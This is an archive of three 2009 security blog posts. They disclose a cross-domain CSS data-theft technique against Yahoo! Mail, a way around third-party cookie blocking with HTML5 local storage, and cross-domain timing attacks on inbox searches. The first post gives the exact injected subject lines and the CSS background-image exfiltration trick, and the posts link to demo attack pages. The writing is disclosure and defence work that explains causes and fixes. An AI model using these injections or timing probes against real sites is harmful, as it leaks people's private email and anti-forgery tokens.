Monday, December 28, 2009

Generic cross-browser cross-domain theft

Well, here's a nice little gem for the festive season. I like it for a few distinct reasons:

  1. It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified.

  2. Accordingly, it affected all 5 major browsers. And likely the rest.

  3. You can still be a theft victim even with plugins and JavaScript disabled!
It's much less serious than it could be because there are restrictions on the format of cross-domain data which can be stolen, and the attacker needs to be able to exercise limited control of the target theft page.
The issue is best introduced with an example. The example chosen is deliberately a little bit involved and not too severe. This is to give the upcoming browser updates a chance to get deployed.

Example: Yahoo! Mail cross-domain subject line theft and e-mail deletion

(It's important to note there is no apparent failing of the web app in question here).

  • Step 1: E-mail your victim@yahoo.com with the subject line ');}

  • Step 2: Wait a bit (assume that other e-mails are delivered to the victim at this time)

  • Step 3: E-mail your victim@yahoo.com with the subject line {}body{background-image:url('http://google.com/ and include in the body: PLEASE CLICK http://cevans-app.appspot.com/static/yahoocss.html

  • Step 4: Mild profit if the victim clicks the link.

If you set up the above scenario as a test, you might see something like this in an alert box upon clicking the link:

url(http://google.com/%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3493_AGvHtEQAAWFgSgIzgAlWYQXHqDY&3=q%22%3ESuper%20sensitive%20subject%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3933_AGTHtEQAAM%2FHSgIzawpE8Fwm1%2FI&5=x%22%3E)

The above text is stolen cross-domain, and the interesting pieces are highlighted in bold. The data includes the subjects, senders and "mid" value for all e-mails received between the two set-up e-mails we sent the victim.
Although leaking of subjects and senders is not ideal, it's the "mid" value that interests us most as an attacker. This would appear to be a secure / unguessable ID. Accordingly, it is reasonable for the mail application to rely on it as a distinct anti-XSRF token. This is indeed the case for the "delete" operation, implemented as a simple HTTP GET request. Interestingly, the "forward" operation seems to have an additional anti-XSRF token in the POST body, making the "mid" leak not nearly as serious as it could have been.

That's how this whole attack proceeds in its most powerful form: leak a small amount of text cross-domain, and then bingo! if the leaked text happens to include a global anti-XSRF token.

How does it work?

It works by abusing the standards relating to the loading of CSS style sheets. Approximately, the standards are:

  • Send cookies on any load of CSS, including cross-domain.

  • When parsing the returned CSS, ignore any amount of crap leading up to a valid CSS descriptor.
By controlling a little bit of text in the victim domain, the attacker can inject what appears to be a valid CSS string. It does not matter what proceeds this CSS string: HTML, binary data, JSON, XML. The CSS parser will ruthlessly hunt down any CSS constructs within whatever blob is pulled from the victim's domain. To the CSS parser, the text in the above attack looks like this:

(some HTML junk; whatever){} body{background-image:url('http://google.com/%3C/a...stolen stuff...')}(some trailing HTML junk)

So, the background of the attacker's page will be styled with a background image loaded from an URL, the path of which contains stolen data! One lovely twist of using a CSS string which is an URL is that it will be automatically fetched even if JavaScript is turned off! The stolen data is then harvested by the attacker from their web server logs.
Fortunately, there are various barriers to exploiting this:

  • Any newlines in the injected string break the CSS parse. This is a very common condition which stops potentially serious attacks.

  • CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string.

  • The attacker needs control of two injection points: pre-string and post-string. For many sensitive pages, the attacker won't have sufficient influence over the page data via URL params or reflection of attacker data.
General areas that are more susceptible to this attack include:

  • JSON / XML feeds (common lack of newlines; no requirement to escape " (JSON strings) or ' (XML text nodes)).

  • Socially-related websites (the victim is always browsing attacker-controlled strings such as comments on their mundane photos, etc).

How do we fix it?

It would be nice to be able to not send cookies for cross-domain CSS loads; however that would certainly break stuff and it's hard to measure what without actually causing the breakage.

It would be nice to be strict on the MIME type when loading CSS resources -- if not globally then at least for cross-domain loads. But this breaks high profile sites, *cough* configure.dell.com and text/plain *cough*. (To be fair, it gets much worse with many sites even using text/html, application/octet-stream, it goes on).

A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken. This is the approach I used in my pending WebKit patch.

Note that fixing this issue also fixes my previous attack of using cross-domain CSS to reliably tell if someone is logged in or not:

http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html

Credits

  • Aaron Sigel, for interesting discussions about using /* styled multi-line comments to bypass the newline restriction. Looks like it's not possible to recover comment text but we didn't test all the browsers.

  • Opera, for seemingly fixing this in v10.10 - although I don't know the exact heuristic used.

  • The WebKit and Mozilla communities for good feedback on approaches and patches.

Tuesday, December 22, 2009

Bypassing the intent of blocking "third-party" cookies

[Aside: I'm not sure anyone cares, particularly because the "block third party cookies" option tends to break legitimate web sites. But I'll document it just in case :)]

Major browsers tend to have an option to block "third-party" cookies. The main intent of this is to disable tracking cookies used by iframe'd ads.

It turns out that you can bypass this intent by abusing "HTML5 Local Storage". This modern browser facility is present in (at least) Firefox 3.5, Safari 4 and even the normally-lagging IE8. Chrome 4 Beta has it too, making it well supported across all browsers and a more tempting target.

In concept, HTML5 Local Storage is very similar to cookies. On a per-origin basis, there is a set of disk-persisted name / value pairs.

With a simple test, it's easy to show that the HTML5 Local Storage feature is not affected by the third-party cookie setting. I believe this holds across all the above browsers. A simple test page that gets / sets a name / value pair from within a third-party iframe may be located here:

http://scary.beasts.org/misc/iframe_storage.html

(This page also tests for a similar situation with HTML5 Web Database, but that is so far a less supported standard).

What's interesting is that all these browsers did remember to disable these persisted databases in their various private modes.

Friday, December 11, 2009

Cross-domain search timing

I've been meaning to fiddle around with timing attacks for a while. I've had various discussions in the past about the significance of login determination attacks (including ones I found myself) and my usual response would be "it's all moot -- the attacker could just use a timing attack". Finally, here's some ammo to support that position. And -- actual cross-domain data theft using just a timing attack, as a bonus.

Unfortunately, this is another case of the web being built upon broken specifications and protocols. There's nothing to stop domain evil.com referencing resources on some.sensitive.domain.com and timing how long the server takes to respond. For a GET request, a good bet is the <img> tag plus the onerror() / onload() events. For a POST request, you can direct the post to an <iframe> element and monitor the onload() event.

Why should an evil domain be able to read timing information from any other domain? Messy. Actually, it's even worse than that. Even if the core web model didn't fire the relevant event handles for cross-domain loads, there would still be trouble. The attacker is at liberty to monitor the performance of a bunch of busy-loops in Javascript. The attacker then frames or opens a new window for the HTML page they are interested in. When performance drops, the server likely responded. When performance goes up again, the client likely finished rendering. That's two events and actually a leak of more information that the pure-event case.

Moving on to something real. The most usable primitive that this gives the attacker is a 1-bit leak of information. i.e. was the request relatively fast or relatively slow? I have a little demo:

https://cevans-app.appspot.com/static/ymailtimings.html

It takes a few seconds, but if I'm not logged into Yahoo! Mail, I see:

DONE! 7 79 76 82

From the relatively flat timings of the last three timings (three different inbox searches) and the relative latency between the first number and the latter three, it's pretty clear I'm not logged in to Yahoo! Mail.

If I'm logged in, I see:

DONE! 10 366 414 539

This is where things get interesting. I am clearly logged in because of the significant server latency inherent in a text search within the inbox. But better still, the last three numbers represent searches for the words nosuchterm1234, sensitive and the. Even with a near-empty inbox, the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index. (I mailed myself with sensitive in the subject to make a clear point).

There are many places to go from here. We have a primitive which can be used to ask cross-domain YES/NO questions about a victim's inbox. Depending on the power of the search we are abusing, we can ask all sorts of questions. e.g. "Has the victim ever mailed X?", "If so, within the past day?", "Does the word earnings appear in the last week?", "What about the phrase 'earnings sharply down'?" etc. etc. By asking the right YES/NO questions in the right order, you could reconstruct sentences.

It's important to note this is not a failing in any particular site. A particular site can be following current best practices and still be bitten by this. Fundamentally, many search operations on web sites are non-state-changing GETs or POSTSs and therefore do not need XSRF protection. The solution, of course, is to add it (and do the check before doing any work on the server like walking indexes)!

With thanks to Michal Zalewski for interesting debate and Christoph Kern for pointing out this ACM paper, which I haven't read but from the abstract it sounds like it covers some less serious angles of the same base attack.